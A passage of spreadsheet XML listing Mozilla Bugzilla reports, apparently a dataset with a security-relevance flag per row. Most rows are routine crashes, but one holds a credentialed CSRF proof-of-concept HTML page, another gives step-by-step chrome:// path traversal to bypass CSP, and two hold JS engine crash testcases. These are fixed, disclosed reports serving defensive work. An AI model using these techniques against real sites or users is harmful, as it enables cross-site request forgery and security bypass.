          <t>Ben will look into this.</t>
        </is>
      </c>
      <c r="X150" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" t="n">
        <v>866915</v>
      </c>
      <c r="B151" t="inlineStr">
        <is>
          <t>2013-04-29 13:59:54 -0700</t>
        </is>
      </c>
      <c r="C151" t="inlineStr">
        <is>
          <t>Do not send data XHR HEAD request</t>
        </is>
      </c>
      <c r="D151" t="inlineStr">
        <is>
          <t>2024-05-30 08:02:34 -0700</t>
        </is>
      </c>
      <c r="E151" t="n">
        <v>1</v>
      </c>
      <c r="F151" t="n">
        <v>1</v>
      </c>
      <c r="G151" t="n">
        <v>3</v>
      </c>
      <c r="H151" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I151" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J151" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K151" t="inlineStr">
        <is>
          <t>20 Branch</t>
        </is>
      </c>
      <c r="L151" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M151" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N151" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O151" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P151" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q151" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R151" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S151" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T151" t="n">
        <v>1</v>
      </c>
      <c r="U151" t="n">
        <v>0</v>
      </c>
      <c r="V151" t="n">
        <v>31</v>
      </c>
      <c r="W151" t="inlineStr">
        <is>
          <t>Created attachment 743269
RequestResponse.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31
Steps to reproduce:
During a penetration test for a client, I found that CSRF was possible on a piece of their functionality when sent as a HEAD.  In the latest version of chrome, they send a preflight request for this HEAD request, but Firefox 20 is not.  I will attach the Request and Response with the sensitive client information omitted.  My CSRF Proof of Concept has xmlhttp.withCredentials = true;.  
I've supplied two things to you, the code that allowed for my exploit to work, as well as the request response pair that happens when the request is sent.  I've omitted sensitive information about the application this worked on because I do not own it, but if needed I'll try to spin up an environment that is similar to what I'm working on to recreate it.  Since I can only upload one file, I'm going to paste my Proof of Concept code here, and attach an image of the actual exploit taking place after the form request was made.
&lt;!-- 
Johnathan Kuskos
This file is psuedocode for a successful CSRF I was able to exploit for a client.
The file was hosted on my personal site at malfiles.jkuskos.com and targetted a URL that i've renamed "example.com" for sake of my client's privacy.  I will attempt to supply as much information as I can, as I believe that a PreFlight request should not have allowed this to take place in Firefox 20.0.  
--&gt;
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
function loadXMLDocHEAD()
{
var xmlhttp;
if (window.XMLHttpRequest)
  {// code for IE7+, Firefox, Chrome, Opera, Safari
  xmlhttp=new XMLHttpRequest();
  }
else
  {// code for IE6, IE5
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.onreadystatechange=function()
  {
  if (xmlhttp.readyState==4 &amp;&amp; xmlhttp.status==200 || xmlhttp.status==302)
    {
    document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
    }
  }
var url = "https://example.com";//true victim omitted
var params = "body=";//true parameters omitted
xmlhttp.withCredentials = true;
xmlhttp.open("HEAD", url,true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.send(params);
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;HEAD request&lt;/h1&gt;
&lt;button type="button" onclick="loadXMLDocHEAD()"&gt;Send HEAD&lt;/button&gt;
&lt;div id="myDiv"&gt;&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
Actual results:
The CORS request was successfully sent.
Expected results:
A Preflight request should have first sent an options request to check for if the HTTP verb was allowed, as specified here:  https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS#Preflighted_requests</t>
        </is>
      </c>
      <c r="X151" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" t="n">
        <v>1423937</v>
      </c>
      <c r="B152" t="inlineStr">
        <is>
          <t>2017-12-07 07:56:28 -0800</t>
        </is>
      </c>
      <c r="C152" t="inlineStr">
        <is>
          <t>Crash [@ js::FrameIter::callObj] with getBacktrace</t>
        </is>
      </c>
      <c r="D152" t="inlineStr">
        <is>
          <t>2018-10-14 20:23:38 -0700</t>
        </is>
      </c>
      <c r="E152" t="n">
        <v>1</v>
      </c>
      <c r="F152" t="n">
        <v>1</v>
      </c>
      <c r="G152" t="n">
        <v>3</v>
      </c>
      <c r="H152" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I152" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J152" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K152" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L152" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M152" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N152" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O152" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P152" t="inlineStr">
        <is>
          <t>[jsbugmon:update]</t>
        </is>
      </c>
      <c r="Q152" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R152" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S152" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T152" t="n">
        <v>1</v>
      </c>
      <c r="U152" t="n">
        <v>0</v>
      </c>
      <c r="V152" t="n">
        <v>22</v>
      </c>
      <c r="W152" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4b94da21a9e6 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-stdcxx-compat --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --cpu-count=2):
function print(x) {
  for (var i = 0; i &lt; 40; ++i) {
      var stack = getBacktrace({args: true});
      (function( ... target     )  { g = x;});
}
  setInterruptCallback(function() {
    print("Worker Interrupt!");
  });
    interruptIf(true);
  print("MainThread: " + i);
}
print("MainThread Done!");
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x0000000000c3e726 in js::FrameIter::callObj (this=this@entry=0x7ffffffdccc0, cx=&lt;optimized out&gt;) at js/src/vm/Stack.cpp:1290
#0  0x0000000000c3e726 in js::FrameIter::callObj (this=this@entry=0x7ffffffdccc0, cx=&lt;optimized out&gt;) at js/src/vm/Stack.cpp:1290
#1  0x00000000009f87df in FormatFrame (showThisProps=false, showLocals=false, showArgs=true, num=2, inBuf=&lt;unknown type in js, CU 0x39ce882, DIE 0x3bb1ad5&gt;, iter=..., cx=0x7ffff5f16000) at js/src/jsfriendapi.cpp:890
#2  JS::FormatStackDump(JSContext*, mozilla::UniquePtr&lt;char [], JS::FreePolicy&gt;&amp;&amp;, bool, bool, bool) (cx=0x7ffff5f16000, inBuf=inBuf@entry=&lt;unknown type in /mnt/LangFuzz/work/builds/debug64/dist/bin/js, CU 0x39ce882, DIE 0x3cb3bd8&gt;, showArgs=true, showLocals=false, showThisProps=false) at js/src/jsfriendapi.cpp:1079
#3  0x0000000000897662 in GetBacktrace (cx=0x7ffff5f16000, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/builtin/TestingFunctions.cpp:3296
#4  0x0000199a83660b1d in ?? ()
[...]
#8  0x0000000000000000 in ?? ()
rax	0x1f8ede0	33091040
rbx	0x1fe00a0	33423520
rcx	0x7ffff5088280	140737304363648
rdx	0x1f8ede0	33091040
rsi	0x1fdfe00	33422848
rdi	0x7ffff508b060	140737304375392
rbp	0x7ffffffdc900	140737488210176
rsp	0x7ffffffdc8d0	140737488210128
r8	0x7ffff4f104c5	140737302824133
r9	0x7ffff4f10698	140737302824600
r10	0x7ffff4f106e8	140737302824680
r11	0x206	518
r12	0x0	0
r13	0x1fdff20	33423136
r14	0x1fe0060	33423456
r15	0x1fdff60	33423200
rip	0xc3e726 &lt;js::FrameIter::callObj(JSContext*) const+86&gt;
=&gt; 0xc3e726 &lt;js::FrameIter::callObj(JSContext*) const+86&gt;:	mov    (%r12),%rax
   0xc3e72a &lt;js::FrameIter::callObj(JSContext*) const+90&gt;:	mov    (%rax),%rax</t>
        </is>
      </c>
      <c r="X152" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" t="n">
        <v>1432870</v>
      </c>
      <c r="B153" t="inlineStr">
        <is>
          <t>2018-01-24 10:43:29 -0800</t>
        </is>
      </c>
      <c r="C153" t="inlineStr">
        <is>
          <t>Path traversal on chrome:// URLs</t>
        </is>
      </c>
      <c r="D153" t="inlineStr">
        <is>
          <t>2024-05-30 09:42:18 -0700</t>
        </is>
      </c>
      <c r="E153" t="n">
        <v>1</v>
      </c>
      <c r="F153" t="n">
        <v>1</v>
      </c>
      <c r="G153" t="n">
        <v>3</v>
      </c>
      <c r="H153" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I153" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J153" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K153" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L153" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M153" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N153" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O153" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P153" t="inlineStr">
        <is>
          <t>[adv-main59+]</t>
        </is>
      </c>
      <c r="Q153" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R153" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S153" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T153" t="n">
        <v>1</v>
      </c>
      <c r="U153" t="n">
        <v>0</v>
      </c>
      <c r="V153" t="n">
        <v>32</v>
      </c>
      <c r="W153" t="inlineStr">
        <is>
          <t>Created attachment 8945158
csp_bypass_require_chromeurl.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Build ID: 20180122220231
Steps to reproduce:
This bug exists in Firefox's legacy extension system. The legacy extension is still used in the browser internally.
Usually, only if the extension's resources are defined on `chrome.manifest` and it has a `contentaccessible=yes` flag, the defined resources can be loaded from web pages via &lt;script&gt; tag or other tags. However, by using crafted path string, even non-contentaccessible resources can be loaded from web pages. Due to this bug, as I described in bug 1432358, it causes an universal bypass of CSP strict-dynamic via chrome:// URL. I attached PoC again.
Steps to Reproduce:
1. See `chrome.manifest` file of browser internal resources from the following URL (in case of  Windows):
jar:file:///C:/Program%20Files/Nightly/browser/omni.ja!/chrome/chrome.manifest
2. Find this line:
content browser browser/content/browser/ contentaccessible=yes
This means that any web pages can load the resources placed on jar:file:///C:/Program%20Files/Nightly/browser/omni.ja!/chrome/browser/content/browser/* via chrome://browser/content/* URLs.
3. The resources placed on jar:file:///C:/Program%20Files/Nightly/browser/omni.ja!/chrome/devtools/* do not have a contentaccessible flag. So, usually it should not be loaded from web pages.
However, using the following crafted URL, it can be loaded from web pages:
(Please take notice to the two slashes of "content//chrome". )
chrome://browser/content//chrome/devtools/modules/devtools/client/jsonview/lib/require.js
It seems that the following path format causes this issue:
chrome:// [ACCESSIBLE_PATH] // [NON_ACCESSIBLE_PATH]</t>
        </is>
      </c>
      <c r="X153" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" t="n">
        <v>1355168</v>
      </c>
      <c r="B154" t="inlineStr">
        <is>
          <t>2017-04-10 11:18:13 -0700</t>
        </is>
      </c>
      <c r="C154" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::CanvasRenderingContext2D::DrawWindow</t>
        </is>
      </c>
      <c r="D154" t="inlineStr">
        <is>
          <t>2022-06-06 09:33:03 -0700</t>
        </is>
      </c>
      <c r="E154" t="n">
        <v>1</v>
      </c>
      <c r="F154" t="n">
        <v>1</v>
      </c>
      <c r="G154" t="n">
        <v>3</v>
      </c>
      <c r="H154" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I154" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J154" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K154" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N154" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P154" t="inlineStr">
        <is>
          <t>[gfx-noted]</t>
        </is>
      </c>
      <c r="Q154" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R154" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S154" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T154" t="n">
        <v>1</v>
      </c>
      <c r="U154" t="n">
        <v>0</v>
      </c>
      <c r="V154" t="n">
        <v>30</v>
      </c>
      <c r="W154" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-37a74ca7-df8b-412f-8f55-638602170405.
=============================================================
We have more crashes (132 in the past 7 days) than I expected for this signature,
given that it's an internal API.
Windows 7	65	49.2%
OS X 10.12	17	12.9%
Windows 10	17	12.9%
Windows XP	15	11.4%
Windows 8.1	10	7.6%
Windows Vista	4	3.0%
OS X 10.11	3	2.3%
Android	        1	0.8%
Looks like all are null-pointer crashes.
I'm guessing mTarget is null here:
https://hg.mozilla.org/mozilla-central/annotate/7a3f514cf849/dom/canvas/CanvasRenderingContext2D.cpp#l5278
due to the nsContentUtils::FlushLayoutForTree call on line 5234.</t>
        </is>
      </c>
      <c r="X154" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" t="n">
        <v>695076</v>
      </c>
      <c r="B155" t="inlineStr">
        <is>
          <t>2011-10-17 11:40:19 -0700</t>
        </is>
      </c>
      <c r="C155" t="inlineStr">
        <is>
          <t>Crash in ANGLE's libGLESv2, in glTexImage2D on a cube map, invalid read in gl::Texture::createSurface</t>
        </is>
      </c>
      <c r="D155" t="inlineStr">
        <is>
          <t>2012-02-17 04:19:05 -0800</t>
        </is>
      </c>
      <c r="E155" t="n">
        <v>1</v>
      </c>
      <c r="F155" t="n">
        <v>1</v>
      </c>
      <c r="G155" t="n">
        <v>3</v>
      </c>
      <c r="H155" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I155" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J155" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L155" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M155" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N155" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P155" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q155" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R155" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S155" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T155" t="n">
        <v>1</v>
      </c>
      <c r="U155" t="n">
        <v>0</v>
      </c>
      <c r="V155" t="n">
        <v>19</v>
      </c>
      <c r="W155" t="inlineStr">
        <is>
          <t>Ben Hawkes reports that his testcase from Bug 686398,
  https://bugzilla.mozilla.org/attachment.cgi?id=559916
still crashes Firefox 10.0a1 on Windows. Here is a crash report:
https://crash-stats.mozilla.com/report/index/bp-75d8250b-6c46-4f0d-8115-6a6472111017
This is very different from Bug 686398, is a ANGLE bug (need to report upstream) and potentially a security concern (invalid read at non-null address).</t>
        </is>
      </c>
      <c r="X155" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" t="n">
        <v>640246</v>
      </c>
      <c r="B156" t="inlineStr">
        <is>
          <t>2011-03-09 11:10:47 -0800</t>
        </is>
      </c>
      <c r="C156" t="inlineStr">
        <is>
          <t>All links in Personas Plus should go to https:// version of the pages, not http://</t>
        </is>
      </c>
      <c r="D156" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E156" t="n">
        <v>1</v>
      </c>
      <c r="F156" t="n">
        <v>1</v>
      </c>
      <c r="G156" t="n">
        <v>6</v>
      </c>
      <c r="H156" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I156" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J156" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K156" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L156" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M156" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N156" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P156" t="inlineStr"/>
      <c r="Q156" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R156" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S156" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T156" t="n">
        <v>1</v>
      </c>
      <c r="U156" t="n">
        <v>0</v>
      </c>
      <c r="V156" t="n">
        <v>3</v>
      </c>
      <c r="W156" t="inlineStr">
        <is>
          <t>Menu items in Personas Plus go to http: URLs, not https:, which triggers the "looks like I'm logged out" bug:
* More from [artist name]... (on current persona)
* View details... (on current persona)
* Go to My Favorites...
* ### More from New and Featured...
* ### More from Most Popular...
* ### More from [all gallery names]... under "All"
There may be other URLs in the add-on that should be switched to https: as well, so if you could check that would be awesome. 
Putting this at Major because we really, really want to get this add-on released this week if at all possible..</t>
        </is>
      </c>
      <c r="X156" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" t="n">
        <v>615825</v>
      </c>
      <c r="B157" t="inlineStr">
        <is>
          <t>2010-12-01 02:15:22 -0800</t>
        </is>
      </c>
      <c r="C157" t="inlineStr">
        <is>
          <t>Not putting enough space around {for} tags can collapse blocks incorrectly</t>
        </is>
      </c>
      <c r="D157" t="inlineStr">
        <is>
          <t>2010-12-07 13:39:47 -0800</t>
        </is>
      </c>
      <c r="E157" t="n">
        <v>1</v>
      </c>
      <c r="F157" t="n">
        <v>1</v>
      </c>
      <c r="G157" t="n">
        <v>5</v>
      </c>
      <c r="H157" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I157" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J157" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K157" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N157" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P157" t="inlineStr"/>
      <c r="Q157" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R157" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S157" t="inlineStr">
        <is>
          <t>2.3.2</t>
        </is>
      </c>
      <c r="T157" t="n">
        <v>1</v>
      </c>
      <c r="U157" t="n">
        <v>0</v>
      </c>
      <c r="V157" t="n">
        <v>8</v>
      </c>
      <c r="W157" t="inlineStr">
        <is>
          <t>Some localized articles have {for fx3} in them. Currently we display a blank page when that happens, even if there are parts marked as {for fx35}, see here: https://support.mozilla.com/it/kb/Individuare%20la%20versione%20di%20Firefox%20utilizzata#os=mac&amp;browser=fx35
The parser should just ignore the parts marked as {for fx3}, so we don't have to immediately work on hundreds of localized articles</t>
        </is>
      </c>
      <c r="X157" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" t="n">
        <v>298659</v>
      </c>
      <c r="B158" t="inlineStr">
        <is>
          <t>2005-06-23 23:50:59 -0700</t>
        </is>
      </c>
      <c r="C158" t="inlineStr">
        <is>
          <t>setting authentication to LDAP,DB fails</t>
        </is>
      </c>
      <c r="D158" t="inlineStr">
        <is>
          <t>2005-07-07 21:48:52 -0700</t>
        </is>
      </c>
      <c r="E158" t="n">
        <v>1</v>
      </c>
      <c r="F158" t="n">
        <v>1</v>
      </c>
      <c r="G158" t="n">
        <v>4</v>
      </c>
      <c r="H158" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I158" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J158" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K158" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M158" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N158" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P158" t="inlineStr"/>
      <c r="Q158" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R158" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S158" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T158" t="n">
        <v>1</v>
      </c>
      <c r="U158" t="n">
        <v>0</v>
      </c>
      <c r="V158" t="n">
        <v>14</v>
      </c>
      <c r="W158" t="inlineStr">
        <is>
          <t>setting authentication to LDAP,DB fails; once the parameter is set,
authentication results in the following error:
file error - account/auth/ldap,db-error.html.tmpl: not found</t>
        </is>
      </c>
      <c r="X158" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" t="n">
        <v>502017</v>
      </c>
      <c r="B159" t="inlineStr">
        <is>
          <t>2009-07-02 11:06:07 -0700</t>
        </is>
      </c>
      <c r="C159" t="inlineStr">
        <is>
          <t>Crash [@ nsHTMLReflowState::GetHypotheticalBoxContainer] with -moz-column, overflow, clear, margin, fixed pos, and float</t>
        </is>
      </c>
      <c r="D159" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E159" t="n">
        <v>1</v>
      </c>
      <c r="F159" t="n">
        <v>1</v>
      </c>
      <c r="G159" t="n">
        <v>3</v>
      </c>
      <c r="H159" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I159" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J159" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K159" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L159" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P159" t="inlineStr">
        <is>
          <t>[sg:critical?][fixed by bug 67752 on m-c][1.9.1.2+]</t>
        </is>
      </c>
      <c r="Q159" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R159" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S159" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T159" t="n">
        <v>1</v>
      </c>
      <c r="U159" t="n">
        <v>0</v>
      </c>
      <c r="V159" t="n">
        <v>32</v>
      </c>
      <c r="W159" t="inlineStr">
        <is>
          <t>Created attachment 386557
testcase 1 (crashes on loading in 1.9.1 &amp; 1.9.0)
I'm filing this bug for a remaining 1.9.1 crash, with a modified version of bug 467493's testcase. (just adding an empty floated div)  See in particular bug 467493 comment 25.
The attached "testcase 1" crashes in both optimized and debug 1.9.1 builds.  (This testcase is the same as "testcase 3" on bug 467493)
In my debug build, I get these assertions before the crash:
###!!! ASSERTION: Placeholder relationship should have been torn down; see comments in nsPlaceholderFrame.h: '!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)', file /mozilla/layout/generic/nsPlaceholderFrame.cpp, line 132
###!!! ASSERTION: no placeholder frame: 'nsnull != placeholderFrame', file /mozilla/layout/generic/nsHTMLReflowState.cpp, line 1122
I also get many copies of this warning:
WARNING: bad value: file /mozilla/layout/generic/nsFloatManager.cpp, line 149
Crash report (hasn't loaded yet, but should soon):
http://crash-stats.mozilla.com/report/pending/f7955dc3-a1ff-4e8a-a542-bdc8f2090702</t>
        </is>
      </c>
      <c r="X159" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" t="n">
        <v>973874</v>
      </c>
      <c r="B160" t="inlineStr">
        <is>
          <t>2014-02-18 05:39:51 -0800</t>
        </is>
      </c>
      <c r="C160" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::Simulator::instructionDecode] with poisoned pointer (0xdeadbeef)</t>
        </is>
      </c>
      <c r="D160" t="inlineStr">
        <is>
          <t>2015-05-18 15:32:52 -0700</t>
        </is>
      </c>
      <c r="E160" t="n">
        <v>1</v>
      </c>
      <c r="F160" t="n">
        <v>1</v>
      </c>
      <c r="G160" t="n">
        <v>3</v>
      </c>
      <c r="H160" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I160" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J160" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K160" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L160" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M160" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N160" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P160" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q160" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R160" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S160" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T160" t="n">
        <v>1</v>
      </c>
      <c r="U160" t="n">
        <v>0</v>
      </c>
      <c r="V160" t="n">
        <v>31</v>
      </c>
      <c r="W160" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 339f0d450d46 (x86 ARM simulator build, run with --fuzzing-safe --ion-eager --ion-check-range-analysis):
function test() {
eval("var M4x4 = {};\
M4x4.mul = function M4x4_mul(a, r) {\
    a11 = a[0];\
    a21 = a[1];\
    a23 = a[9];\
    a33 = M4x4_mul[10];\
    return r;\
};\
M4x4.makeLookAt = function() {\
    tm1 = Float32Array(16);\
    tm2 = Float32Array(16);\
    r = new Float32Array(16);\
    return M4x4.mul(tm1, tm2, r);\
};\
for(j = 0; j &lt; 3; j++)\
    M4x4.mul(M4x4.makeLookAt(), M4x4.makeLookAt());\
");
} test();</t>
        </is>
      </c>
      <c r="X160" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" t="n">
        <v>241440</v>
      </c>
      <c r="B161" t="inlineStr">
        <is>
          <t>2004-04-23 03:51:06 -0700</t>
        </is>
      </c>
      <c r="C161" t="inlineStr">
        <is>
          <t>memory overflow in UTF8ToNewUnicode</t>
        </is>
      </c>
      <c r="D161" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
